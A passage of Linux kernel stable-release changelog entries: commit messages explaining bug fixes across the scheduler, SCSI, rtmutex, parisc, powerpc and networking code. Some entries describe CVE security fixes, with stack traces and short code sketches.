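   * the increased load resolution used on 64-bit kernels */
  idx = nice + 20;
  err = sched_group_set_shares(ag->tg,
                               scale_load(sched_prio_to_weight[idx]));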
Michael Kerrisk tested this patch to fix the problem:
> Applied and tested against 4.9-rc6 on an Intel u7 (4 cores).
> Test setup:
>
> Terminal window 1: running 40 CPU burner jobs
> Terminal window 2: running 40 CPU burner jobs
> Terminal window 3: running 1 CPU burner job
>
> Demonstrated that:
> * Writing "0" to the autogroup file for TW1 now causes no change
> to the rate at which the process on the terminal consume CPU.
> * Writing -20 to the autogroup file for TW1 caused those processes
> to get the lion's share of CPU while TW2 TW3 get a tiny amount.
> * Writing -20 to the autogroup files for TW1 and TW3 allowed the
> process on TW3 to get as much CPU as it was getting when
> the autogroup nice values for both terminals were 0.
Reported-by: Michael Kerrisk <mtk.manpages@gmail.com>
Tested-by: Michael Kerrisk <mtk.manpages@gmail.com>
Signed-off-by: Mike Galbraith <umgwanakikbuti@gmail.com>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Thomas Gleixner <tglx@linutronix.de>
Cc: linux-man <linux-man@vger.kernel.org>
Link: http://lkml.kernel.org/r/1479897217.4306.6.camel@gmx.de
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2319f847a8 upstream.
The BUG_ON() recently introduced in lpfc_sli_ringtxcmpl_put() is hit in
the lpfc_els_abort() > lpfc_sli_issue_abort_iotag() >
lpfc_sli_abort_iotag_issue() function path [similar names], due to
'piocb->vport == NULL':
BUG_ON(!piocb || !piocb->vport);
This happens because lpfc_sli_abort_iotag_issue() doesn't set the
'abtsiocbp->vport' pointer -- but this is not the problem.
Previously, lpfc_sli_ringtxcmpl_put() accessed 'piocb->vport' only if
'piocb->iocb.ulpCommand' is neither CMD_ABORT_XRI_CN nor
CMD_CLOSE_XRI_CN, which are the only possible values for
lpfc_sli_abort_iotag_issue():
lpfc_sli_ringtxcmpl_put():
if ((unlikely(pring->ringno == LPFC_ELS_RING)) &&
(piocb->iocb.ulpCommand != CMD_ABORT_XRI_CN) &&
(piocb->iocb.ulpCommand != CMD_CLOSE_XRI_CN) &&
(!(piocb->vport->load_flag & FC_UNLOADING)))
lpfc_sli_abort_iotag_issue():
if (phba->link_state >= LPFC_LINK_UP)
iabt->ulpCommand = CMD_ABORT_XRI_CN;
else
iabt->ulpCommand = CMD_CLOSE_XRI_CN;
So, this function path would not have hit this possible NULL pointer
dereference before.
In order to fix this regression, move the second part of the BUG_ON()
check prior to the pointer dereference that it does check for.
For reference, this is the stack trace observed. The problem happened
because an unsolicited event was received - a PLOGI was received after
our PLOGI was issued but not yet complete, so the discovery state
machine goes on to sw-abort our PLOGI.
kernel BUG at drivers/scsi/lpfc/lpfc_sli.c:1326!
Oops: Exception in kernel mode, sig: 5 [#1]
<...>
NIP [...] lpfc_sli_ringtxcmpl_put+0x1c/0xf0 [lpfc]
LR [...] __lpfc_sli_issue_iocb_s4+0x188/0x200 [lpfc]
Call Trace:
[...] [...] __lpfc_sli_issue_iocb_s4+0xb0/0x200 [lpfc] (unreliable)
[...] [...] lpfc_sli_issue_abort_iotag+0x2b4/0x350 [lpfc]
[...] [...] lpfc_els_abort+0x1a8/0x4a0 [lpfc]
[...] [...] lpfc_rcv_plogi+0x6d4/0x700 [lpfc]
[...] [...] lpfc_rcv_plogi_plogi_issue+0xd8/0x1d0 [lpfc]
[...] [...] lpfc_disc_state_machine+0xc0/0x2b0 [lpfc]
[...] [...] lpfc_els_unsol_buffer+0xcc0/0x26c0 [lpfc]
[...] [...] lpfc_els_unsol_event+0xa8/0x220 [lpfc]
[...] [...] lpfc_complete_unsol_iocb+0xb8/0x138 [lpfc]
[...] [...] lpfc_sli4_handle_received_buffer+0x6a0/0xec0 [lpfc]
[...] [...] lpfc_sli_handle_slow_ring_event_s4+0x1c4/0x240 [lpfc]
[...] [...] lpfc_sli_handle_slow_ring_event+0x24/0x40 [lpfc]
[...] [...] lpfc_do_work+0xd88/0x1970 [lpfc]
[...] [...] kthread+0x108/0x130
[...] [...] ret_from_kernel_thread+0x5c/0xbc
<...>
Fixes: 22466da5b4 ("lpfc: Fix possible NULL pointer dereference")
Reported-by: Harsha Thyagaraja <hathyaga@in.ibm.com>
Signed-off-by: Mauricio Faria de Oliveira <mauricfo@linux.vnet.ibm.com>
Reviewed-by: Johannes Thumshirn <jthumshirn@suse.de>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 325896ffdf upstream.
Hugh notes in response to commit 4cb19355ea "device-dax: fail all
private mapping attempts":
"I think that is more restrictive than you intended: haven't tried, but I
believe it rejects a PROT_READ, MAP_SHARED, O_RDONLY fd mmap, leaving no
way to mmap /dev/dax without write permission to it."
Indeed it does restrict read-only mappings, switch to checking
VM_MAYSHARE, not VM_SHARED.
Cc: Dave Hansen <dave.hansen@linux.intel.com>
Cc: Pawel Lebioda <pawel.lebioda@intel.com>
Fixes: 4cb19355ea ("device-dax: fail all private mapping attempts")
Reported-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Dan Williams <dan.j.williams@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dbb26055de upstream.
David reported a futex/rtmutex state corruption. It's caused by the
following problem:
CPU0                    CPU1                    CPU2
l->owner=T1
                        rt_mutex_lock(l)
                        lock(l->wait_lock)
                        l->owner = T1 | HAS_WAITERS;
                        enqueue(T2)
                        boost()
                        unlock(l->wait_lock)
                        schedule()
                                                rt_mutex_lock(l)
                                                lock(l->wait_lock)
                                                l->owner = T1 | HAS_WAITERS;
                                                enqueue(T3)
                                                boost()
                                                unlock(l->wait_lock)
                                                schedule()
                        signal(->T2)            signal(->T3)
                        lock(l->wait_lock)
                        dequeue(T2)
                        deboost()
                        unlock(l->wait_lock)
                                                lock(l->wait_lock)
                                                dequeue(T3)
                                                ===> wait list is now empty
                                                deboost()
                                                unlock(l->wait_lock)
                        lock(l->wait_lock)
                        fixup_rt_mutex_waiters()
                        if (wait_list_empty(l)) {
                          owner = l->owner & ~HAS_WAITERS;
                          l->owner = owner
                          ==> l->owner = T1
                        }
                                                lock(l->wait_lock)
rt_mutex_unlock(l)                              fixup_rt_mutex_waiters()
                                                if (wait_list_empty(l)) {
                                                  owner = l->owner & ~HAS_WAITERS;
cmpxchg(l->owner, T1, NULL)
===> Success (l->owner = NULL)
                                                  l->owner = owner
                                                  ==> l->owner = T1
                                                }
That means the problem is caused by fixup_rt_mutex_waiters(), which does the
RMW to clear the waiters bit unconditionally when there are no waiters in
the rtmutex's rbtree.
This can be fatal: a concurrent unlock can release the rtmutex in the
fastpath because the waiters bit is not set. If the cmpxchg() gets in the
middle of the RMW operation, then the previous owner, which just unlocked
the rtmutex, is set as the owner again when the write takes place after the
successful cmpxchg().
The solution is rather trivial: verify that the owner member of the rtmutex
has the waiters bit set before clearing it. This does not require a
cmpxchg() or other atomic operations because the waiters bit can only be
set and cleared with the rtmutex wait_lock held. It's also safe against the
fast path unlock attempt. The unlock attempt via cmpxchg() will either see
the bit set and take the slowpath or see the bit cleared and release it
atomically in the fastpath.
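A minimal sketch of the idea (simplified; the real fixup_rt_mutex_waiters()
carries more commentary about the ordering):

  unsigned long owner, *p = (unsigned long *) &lock->owner;

  if (rt_mutex_has_waiters(lock))
          return;

  /* only clear the bit if it is actually set; setting and clearing
   * both happen under ->wait_lock, so no cmpxchg is needed here */
  owner = READ_ONCE(*p);
  if (owner & RT_MUTEX_HAS_WAITERS)
          WRITE_ONCE(*p, owner & ~RT_MUTEX_HAS_WAITERS);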
It's remarkable that the test program provided by David triggers on ARM64
and MIPS64 really quickly, but it refuses to reproduce on x86-64, while the
problem exists there as well. That refusal might explain why this was not
discovered earlier despite the bug existing from day one of the rtmutex
implementation more than 10 years ago.
Thanks to David for meticulously instrumenting the code and providing the
information which allowed this subtle problem to be decoded.
Reported-by: David Daney <ddaney@caviumnetworks.com>
Tested-by: David Daney <david.daney@cavium.com>
Signed-off-by: Thomas Gleixner <tglx@linutronix.de>
Reviewed-by: Steven Rostedt <rostedt@goodmis.org>
Acked-by: Peter Zijlstra (Intel) <peterz@infradead.org>
Cc: Linus Torvalds <torvalds@linux-foundation.org>
Cc: Mark Rutland <mark.rutland@arm.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Cc: Sebastian Siewior <bigeasy@linutronix.de>
Cc: Will Deacon <will.deacon@arm.com>
Fixes: 23f78d4a03 ("[PATCH] pi-futex: rt mutex core")
Link: http://lkml.kernel.org/r/20161130210030.351136722@linutronix.de
Signed-off-by: Ingo Molnar <mingo@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 24d0492b7d upstream.
At bootup we run measurements to calculate the best threshold for when we
should be using full TLB flushes instead of just flushing a specific amount of
TLB entries. This performance test is run over the kernel text segment.
But running this TLB performance test on the kernel text segment turned out to
crash some SMP machines when the kernel text pages were mapped as huge pages.
To avoid those crashes this patch simply skips this test on some SMP machines
and calculates an optimal threshold based on the maximum number of available
TLB entries and number of online CPUs.
On a technical side, this seems to happen:
The TLB measurement code uses flush_tlb_kernel_range() to flush specific TLB
entries with a page size of 4k (pdtlb 0(sr1,addr)). On UP systems this purge
instruction seems to work without problems even if the pages were mapped as
huge pages. But on SMP systems the TLB purge instruction is broadcasted to
other CPUs. Those CPUs then crash the machine because the page size is not as
expected. C8000 machines with PA8800/PA8900 CPUs were not affected by this
problem, because the required cache coherency prohibits the use of huge
pages at all. Sadly I didn't find any documentation about this behaviour,
so this finding is purely based on testing with physical SMP machines
(A500-44 and J5000, both 2-way boxes).
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit febe42964f upstream.
We have four routines in pacache.S that use temporary alias pages:
copy_user_page_asm(), clear_user_page_asm(), flush_dcache_page_asm() and
flush_icache_page_asm(). copy_user_page_asm() and clear_user_page_asm()
don't purge the TLB entry used for the operation.
flush_dcache_page_asm() and flush_icache_page_asm() do purge the entry.
Presumably, this was thought to optimize TLB use. However, the
operation is quite heavyweight on PA 1.X processors as we need to take
the TLB lock and a TLB broadcast is sent to all processors.
This patch removes the purges from flush_dcache_page_asm() and
flush_icache_page_asm().
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c78e710c1c upstream.
The attached change interchanges the order of purging the TLB and
setting the corresponding page table entry. TLB purges are strongly
ordered. It occurred to me one night that setting the PTE first might
have subtle ordering issues on SMP machines and cause random memory
corruption.
A TLB lock guards the insertion of user TLB entries. So after the TLB
is purged, a new entry can't be inserted until the lock is released.
This ensures that the new PTE value is used when the lock is released.
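Schematically (helper names as used by the parisc mm code; the TLB lock
handling around this sequence is omitted):

  /* purge the stale translation first, then publish the new PTE; a new
   * user TLB entry cannot be inserted until the TLB lock is released,
   * so the new value is guaranteed to be used afterwards */
  purge_tlb_entries(mm, addr);
  set_pte(ptep, pteval);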
Since making this change, no random segmentation faults have been
observed on the Debian hppa buildd servers.
Signed-off-by: John David Anglin <dave.anglin@bell.net>
Signed-off-by: Helge Deller <deller@gmx.de>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c01638f5d9 upstream.
Basically, the pjdfstests set the ownership of a file to 06555, and then
chowns it (as root) to a new uid/gid. Prior to commit a09f99edde ("fuse:
fix killing s[ug]id in setattr"), fuse would send down a setattr with both
the uid/gid change and a new mode. Now, it just sends down the uid/gid
change.
Technically this is NOTABUG, since POSIX doesn't _require_ that we clear
these bits for a privileged process, but Linux (wisely) has done that and I
think we don't want to change that behavior here.
This is caused by the use of should_remove_suid(), which will always return
0 when the process has CAP_FSETID.
In fact we really don't need to be calling should_remove_suid() at all:
we've already been told that we should remove the suid, we just
don't want to use a (very) stale mode for that.
This patch should fix the above as well as simplify the logic.
Reported-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Miklos Szeredi <mszeredi@redhat.com>
Fixes: a09f99edde ("fuse: fix killing s[ug]id in setattr")
Reviewed-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dd7b2f035e upstream.
On 64-bit CPUs with no-execute support and non-snooping icache, such as
970 or POWER4, we have a software mechanism to ensure coherency of the
cache (using exec faults when needed).
This was broken due to a logic error when the code was rewritten
from assembly to C, previously the assembly code did:
BEGIN_FTR_SECTION
mr r4,r30
mr r5,r7
bl hash_page_do_lazy_icache
END_FTR_SECTION(CPU_FTR_NOEXECUTE|CPU_FTR_COHERENT_ICACHE, CPU_FTR_NOEXECUTE)
Which tests that:
(cpu_features & (NOEXECUTE | COHERENT_ICACHE)) == NOEXECUTE
Which says that the current cpu does have NOEXECUTE, but does not have
COHERENT_ICACHE.
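In C, the intended condition looks roughly like this (a sketch; helper
names as in the hash page fault path):

  /* lazy icache flush only when the CPU has NOEXECUTE but does not
   * have a coherent icache */
  if (cpu_has_feature(CPU_FTR_NOEXECUTE) &&
      !cpu_has_feature(CPU_FTR_COHERENT_ICACHE))
          rflags = hash_page_do_lazy_icache(rflags, pte, trap);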
Fixes: 91f1da9979 ("powerpc/mm: Convert 4k hash insert to C")
Fixes: 89ff725051 ("powerpc/mm: Convert __hash_page_64K to C")
Fixes: a43c0eb836 ("powerpc/mm: Convert 4k insert from asm to C")
Signed-off-by: Benjamin Herrenschmidt <benh@kernel.crashing.org>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
[mpe: Change log verbosification]
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 409bf7f8a0 upstream.
In eeh_reset_device(), we take the pci_rescan_remove_lock immediately
after we call eeh_reset_pe() to reset the PCI controller. We then call
eeh_clear_pe_frozen_state(), which can return an error. In this case, we
bail out of eeh_reset_device() without calling pci_unlock_rescan_remove().
Add a call to pci_unlock_rescan_remove() in the eeh_clear_pe_frozen_state()
error path so that we don't cause a deadlock later on.
Reported-by: Pradipta Ghosh <pradghos@in.ibm.com>
Fixes: 7895470063 ("powerpc/eeh: Avoid I/O access during PE reset")
Signed-off-by: Andrew Donnellan <andrew.donnellan@au1.ibm.com>
Acked-by: Russell Currey <ruscur@russell.cc>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b22648781 upstream.
The threshold for OOM protection is too small for systems with large
number of CPUs. Applications report ENOBUFs on connect() every 10
minutes.
The problem is that the variable net->xfrm.flow_cache_gc_count is a
global counter while the variable fc->high_watermark is a per-CPU
constant. Take the number of CPUs into account as well.
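A rough sketch of the scaled threshold (illustrative only; field names as
mentioned above, the exact overload handling may differ):

  /* high_watermark is a per-CPU constant while the gc count is global,
   * so scale the limit by the number of online CPUs before treating
   * the cache as overloaded */
  if (atomic_read(&net->xfrm.flow_cache_gc_count) >
      2 * num_online_cpus() * fc->high_watermark)
          flo = ERR_PTR(-ENOBUFS);        /* refuse to grow the cache */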
Fixes: 6ad3122a08 ("flowcache: Avoid OOM condition under preasure")
Reported-by: Lukáš Koldrt <lk@excello.cz>
Tested-by: Jan Hejl <jh@excello.cz>
Signed-off-by: Miroslav Urbanek <mu@miroslavurbanek.com>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 80d1106aea upstream.
This reverts commit ae148b0858
("ip6_tunnel: Update skb->protocol to ETH_P_IPV6 in ip6_tnl_xmit()").
skb->protocol is now set in __ip_local_out() and __ip6_local_out() before
dst_output() is called. It is no longer necessary to do it for each tunnel.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f418043910 upstream.
When xfrm is applied to TSO/GSO packets, it follows this path:
xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
where skb_gso_segment() relies on skb->protocol to function properly.
This patch sets skb->protocol to ETH_P_IP before dst_output() is called,
fixing a bug where GSO packets sent through a sit tunnel are dropped
when xfrm is involved.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b4e479a96f upstream.
When xfrm is applied to TSO/GSO packets, it follows this path:
xfrm_output() -> xfrm_output_gso() -> skb_gso_segment()
where skb_gso_segment() relies on skb->protocol to function properly.
This patch sets skb->protocol to ETH_P_IPV6 before dst_output() is called,
fixing a bug where GSO packets sent through an ipip6 tunnel are dropped
when xfrm is involved.
Signed-off-by: Eli Cooper <elicooper@gmx.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 87a349f9cc ]
A compile warning was introduced by a commit to fix find_node().
This patch fixes the compile warning by moving find_node() into the __init
section. Because find_node() is only used by memblock_nid_range(), which
is only used by the __init add_node_ranges(), find_node() and
memblock_nid_range() should also be inside the __init section.
Signed-off-by: Thomas Tai <thomas.tai@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 74a5ed5c4f ]
When booting up LDOM, find_node() warns that a physical address
doesn't match a NUMA node.
WARNING: CPU: 0 PID: 0 at arch/sparc/mm/init_64.c:835 find_node+0xf4/0x120
find_node: A physical address doesn't match a NUMA node rule. Some
physical memory will be owned by node 0.
Modules linked in:
CPU: 0 PID: 0 Comm: swapper Not tainted 4.9.0-rc3 #4
Call Trace:
[0000000000468ba0] __warn+0xc0/0xe0
[0000000000468c74] warn_slowpath_fmt+0x34/0x60
[00000000004592f4] find_node+0xf4/0x120
[0000000000dd0774] add_node_ranges+0x38/0xe4
[0000000000dd0b1c] numa_parse_mdesc+0x268/0x2e4
[0000000000dd0e9c] bootmem_init+0xb8/0x160
[0000000000dd174c] paging_init+0x808/0x8fc
[0000000000dcb0d0] setup_arch+0x2c8/0x2f0
[0000000000dc68a0] start_kernel+0x48/0x424
[0000000000dcb374] start_early_boot+0x27c/0x28c
[0000000000a32c08] tlb_fixup_done+0x4c/0x64
[0000000000027f08] 0x27f08
This is because Linux uses an internal structure, node_masks[], to
keep only the best memory latency node. However, an LDOM mdesc can
contain a single latency-group with multiple memory latency nodes.
If the address doesn't match the best latency node within
node_masks[], it should check for an alternative via mdesc.
The warning message should only be printed if the address
matches neither any node_masks[] entry nor anything within mdesc.
To minimize the impact of searching mdesc every time, the last
matched mask and index are stored in a variable.
Signed-off-by: Thomas Tai <thomas.tai@oracle.com>
Reviewed-by: Chris Hyser <chris.hyser@oracle.com>
Reviewed-by: Liam Merwick <liam.merwick@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a52ca62c4a ]
It has been reported that update_suffix can be expensive when it is called
on a large node in which most of the suffix lengths are the same. The time
required to add 200K entries had increased from around 3 seconds to almost
49 seconds.
In order to address this we need to move the code for updating the suffix
out of resize and instead just have it handled in the cases where we are
pushing a node that increases the suffix length, or will decrease the
suffix length.
Fixes: 5405afd1a3 ("fib_trie: Add tracking value for suffix length")
Reported-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Reviewed-by: Robert Shearman <rshearma@brocade.com>
Tested-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 1a239173cc ]
It wasn't necessary to pass a leaf in when doing the suffix updates so just
drop it. Instead just pass the suffix and work with that.
Since we dropped the leaf there is no need to include that in the name so
the names are updated to node_push_suffix and node_pull_suffix.
Finally I noticed that the logic for pulling the suffix length back
actually had some issues. Specifically it would stop prematurely if there
was a longer suffix, but it was not as long as the original suffix. I
updated the code to address that in node_pull_suffix.
Fixes: 5405afd1a3 ("fib_trie: Add tracking value for suffix length")
Suggested-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Reviewed-by: Robert Shearman <rshearma@brocade.com>
Tested-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3b7093346b, the FIB offload
removal didn't occur in 4.8 so that part of this patch isn't here. However
we still need the fib_unmerge() bits. ]
The patch that removed the FIB offload infrastructure was a bit too
aggressive and also removed code needed to clean up after splitting the
table when additional rules were added. Specifically, the function
fib_trie_flush_external was called at the end of adding a new rule to
flush the foreign trie entries from the main trie.
I updated the code so that we only call fib_trie_flush_external on the main
table so that we flush the entries for local from main. This way we don't
call it for every rule change which is what was happening previously.
Fixes: 347e3b28c1 ("switchdev: remove FIB offload infrastructure")
Reported-by: Eric Dumazet <edumazet@google.com>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 0eab121ef8 ]
Prior to commit c0371da604 ("put iov_iter into msghdr") in v3.19, there
was no check that the iovec contained enough bytes for an ICMP header,
and the read loop would walk across neighboring stack contents. Since the
iov_iter conversion, bad arguments are noticed, but the returned error is
EFAULT. Returning EINVAL is a clearer error and also solves the problem
prior to v3.19.
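The check itself is a one-liner (a sketch; icmph_len is the ICMP header
length already known to the common sendmsg path):

  /* the caller must supply at least a full ICMP header */
  if (len < icmph_len)
          return -EINVAL;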
This was found using trinity with KASAN on v3.18:
BUG: KASAN: stack-out-of-bounds in memcpy_fromiovec+0x60/0x114 at addr ffffffc071077da0
Read of size 8 by task trinity-c2/9623
page:ffffffbe034b9a08 count:0 mapcount:0 mapping: (null) index:0x0
flags: 0x0()
page dumped because: kasan: bad access detected
CPU: 0 PID: 9623 Comm: trinity-c2 Tainted: G BU 3.18.0-dirty #15
Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
Call trace:
[<ffffffc000209c98>] dump_backtrace+0x0/0x1ac arch/arm64/kernel/traps.c:90
[<ffffffc000209e54>] show_stack+0x10/0x1c arch/arm64/kernel/traps.c:171
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffc000f18dc4>] dump_stack+0x7c/0xd0 lib/dump_stack.c:50
[< inline >] print_address_description mm/kasan/report.c:147
[< inline >] kasan_report_error mm/kasan/report.c:236
[<ffffffc000373dcc>] kasan_report+0x380/0x4b8 mm/kasan/report.c:259
[< inline >] check_memory_region mm/kasan/kasan.c:264
[<ffffffc00037352c>] __asan_load8+0x20/0x70 mm/kasan/kasan.c:507
[<ffffffc0005b9624>] memcpy_fromiovec+0x5c/0x114 lib/iovec.c:15
[< inline >] memcpy_from_msg include/linux/skbuff.h:2667
[<ffffffc000ddeba0>] ping_common_sendmsg+0x50/0x108 net/ipv4/ping.c:674
[<ffffffc000dded30>] ping_v4_sendmsg+0xd8/0x698 net/ipv4/ping.c:714
[<ffffffc000dc91dc>] inet_sendmsg+0xe0/0x12c net/ipv4/af_inet.c:749
[< inline >] __sock_sendmsg_nosec net/socket.c:624
[< inline >] __sock_sendmsg net/socket.c:632
[<ffffffc000cab61c>] sock_sendmsg+0x124/0x164 net/socket.c:643
[< inline >] SYSC_sendto net/socket.c:1797
[<ffffffc000cad270>] SyS_sendto+0x178/0x1d8 net/socket.c:1761
CVE-2016-8399
Reported-by: Qidan He <i@flanker017.me>
Fixes: c319b4d76b ("net: ipv4: add IPPROTO_ICMP socket kind")
Cc: stable@vger.kernel.org
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit b98b0bc8c4 ]
CAP_NET_ADMIN users should not be allowed to set negative
sk_sndbuf or sk_rcvbuf values, as it can lead to various memory
corruptions, crashes, OOM...
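Schematically, the force variants should clamp with a signed comparison
(a sketch, not the verbatim patch):

  /* a negative val would wrap around if treated as u32; a signed max
   * keeps sk_sndbuf at no less than SOCK_MIN_SNDBUF */
  sk->sk_sndbuf = max_t(int, val * 2, SOCK_MIN_SNDBUF);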
Note that before commit 8298193012 ("net: cleanups in
sock_setsockopt()"), the bug was even more serious, since SO_SNDBUF
and SO_RCVBUF were vulnerable.
This needs to be backported to all known linux kernels.
Again, many thanks to syzkaller team for discovering this gem.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5b01014759 ]
geneve{,6}_build_skb can end up doing a pskb_expand_head(), which
makes the ip_hdr(skb) reference we stashed earlier stale. Since it's
only needed as an argument to ip_tunnel_ecn_encap(), move this
directly into the function call.
Fixes: 08399efc63 ("geneve: ensure ECN info is handled properly in all tx/rx paths")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: John W. Linville <linville@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3de81b7588 ]
Qian Zhang (张谦) reported a potential socket buffer overflow in
tipc_msg_build() which is also known as CVE-2016-8632: due to
insufficient checks, a buffer overflow can occur if MTU is too short for
even tipc headers. As anyone can set device MTU in a user/net namespace,
this issue can be abused by a regular user.
As agreed in the discussion on Ben Hutchings' original patch, we should
check the MTU at the moment a bearer is attached rather than for each
processed packet. We also need to repeat the check when bearer MTU is
adjusted to new device MTU. UDP case also needs a check to avoid
overflow when calculating bearer MTU.
Fixes: b97bf3fd8f ("[TIPC] Initial merge")
Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Reported-by: Qian Zhang (张谦) <zhangqian-c@360.cn>
Acked-by: Ying Xue <ying.xue@windriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 33d446dbba ]
When streaming a lot of data and the RZ/A1 can't keep up, some status bits
will get set that are not being checked or cleared, which causes the
following messages and the Ethernet driver to stop working. This
patch fixes that issue.
irq 21: nobody cared (try booting with the "irqpoll" option)
handlers:
[<c036b71c>] sh_eth_interrupt
Disabling IRQ #21
Fixes: db893473d3 ("sh_eth: Add support for r7s72100")
Signed-off-by: Chris Brandt <chris.brandt@renesas.com>
Acked-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 8c4799ac79 ]
__bcmgenet_tx_reclaim() and bcmgenet_free_rx_buffers() are not using the
same struct device during unmap that was used for the map operation,
which makes DMA-API debugging warn about it. Fix this by always using
&priv->pdev->dev throughout the driver, using an identical device
reference for all map/unmap calls.
Fixes: 1c1008c793 ("net: bcmgenet: add main driver file")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d5c83d0d1d ]
Commit bfe9b9d2df ("cdc_ether: Improve ZTE MF823/831/910 handling")
introduced a work-around in usbnet_cdc_status() for devices that exported
the cdc carrier-on notification twice on connect. Before the commit, this behavior caused
the link state to be incorrect. It was assumed that all CDC Ethernet
devices would either export this behavior, or send one off and then one on
notification (which seems to be the default behavior).
Unfortunately, it turns out multiple devices send a connection
notification multiple times per second (via an interrupt), even when
connection state does not change. This has been observed with several
different USB LAN dongles (at least), for example 13b1:0041 (Linksys).
After bfe9b9d2df, the link state has been set as down and then up for
each notification. This has caused a flood of Netlink NEWLINK messages and
syslog to be flooded with messages similar to:
cdc_ether 2-1:2.0 eth1: kevent 12 may have been dropped
This commit fixes the behavior by reverting usbnet_cdc_status() to how it
was before bfe9b9d2df. The work-around has been moved to a separate
status function which is only called when a known, affected device is
detected.
v1->v2:
* Do not open-code netif_carrier_ok() (thanks Henning Schild).
* Call netif_carrier_off() instead of usb_link_change(). This prevents
calling schedule_work() twice without giving the work queue a chance to be
processed (thanks Bjørn Mork).
Fixes: bfe9b9d2df ("cdc_ether: Improve ZTE MF823/831/910 handling")
Reported-by: Henning Schild <henning.schild@siemens.com>
Signed-off-by: Kristian Evensen <kristian.evensen@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 84ac726023 ]
When packet_set_ring creates a ring buffer it will initialize a
struct timer_list if the packet version is TPACKET_V3. This value
can then be raced by a different thread calling setsockopt to
set the version to TPACKET_V1 before packet_set_ring has finished.
This leads to a use-after-free on a function pointer in the
struct timer_list when the socket is closed as the previously
initialized timer will not be deleted.
The bug is fixed by taking lock_sock(sk) in packet_setsockopt when
changing the packet version while also taking the lock at the start
of packet_set_ring.
